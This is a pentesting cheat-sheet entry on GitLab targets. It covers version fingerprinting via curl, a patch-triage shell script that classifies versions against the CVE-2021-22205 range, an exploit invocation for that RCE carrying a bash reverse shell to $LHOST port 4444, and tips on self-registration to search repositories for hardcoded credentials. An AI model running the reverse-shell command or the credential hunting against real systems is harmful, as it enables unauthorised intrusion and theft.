GitLab

What it is: Self-hosted Git repository manager with CI/CD. Public registration may be enabled, exposing internal source code. Multiple critical RCE CVEs in recent years.

Default ports: 80, 443, 8080

Check GitLab version

Accessible via API or login page. The version determines exploit availability. The /api/v4/version endpoint normally requires an access token and returns 401 without one.

curl -s http://$IP/api/v4/version
curl -s http://$IP/help | grep -i "GitLab"
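
For patch triage on your own instances, the version returned above can be compared against the affected range this page gives for CVE-2021-22205 (11.9 through 13.10.2). This is an added example, not part of the original notes; the function names and the sample responses are constructed for illustration. It uses only the range stated on this page, so treat a match as a prompt to check the vendor advisory for patched point releases.

```bash
#!/bin/sh
# Added example: classify a GitLab version against the range this page
# lists for CVE-2021-22205. Bounds are taken from the page, nothing else.
AFFECTED_MIN="11.9"
AFFECTED_MAX="13.10.2"

# Pull "version" out of an /api/v4/version JSON body, dropping any
# edition suffix such as "-ee". Prints nothing if the field is absent.
extract_version() {
    printf '%s' "$1" \
      | sed -n 's/.*"version"[[:space:]]*:[[:space:]]*"\([0-9][0-9.]*\).*/\1/p'
}

# version_le A B: succeeds when A <= B in version order (GNU sort -V).
version_le() {
    [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n1)" = "$1" ]
}

# Prints "affected", "not-affected" or "unknown" for a version string.
classify_version() {
    case "$1" in
        ''|*[!0-9.]*) echo "unknown"; return 0 ;;
    esac
    if version_le "$AFFECTED_MIN" "$1" && version_le "$1" "$AFFECTED_MAX"; then
        echo "affected"
    else
        echo "not-affected"
    fi
}

# Constructed sample responses (not captured from a real server).
SAMPLE_OLD='{"version":"13.10.2-ee","revision":"0000000"}'
SAMPLE_NEW='{"version":"16.4.1","revision":"0000000"}'
SAMPLE_DENIED='{"message":"401 Unauthorized"}'

for body in "$SAMPLE_OLD" "$SAMPLE_NEW" "$SAMPLE_DENIED"; do
    v="$(extract_version "$body")"
    printf '%-10s %s\n' "${v:-none}" "$(classify_version "$v")"
done
```

An "unknown" result means the version could not be read (for example a 401 body), not that the instance is patched.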

GitLab RCE (CVE-2021-22205)

Unauthenticated RCE via image upload — GitLab 11.9-13.10.2

python3 gitlab_rce.py -u http://$IP -c "bash -i >& /dev/tcp/$LHOST/4444 0>&1"

Register account and explore

Public registration may be enabled — Access internal repos

# http://$IP/users/sign_up
# After login, check: /explore/projects
# Look for hardcoded credentials in repos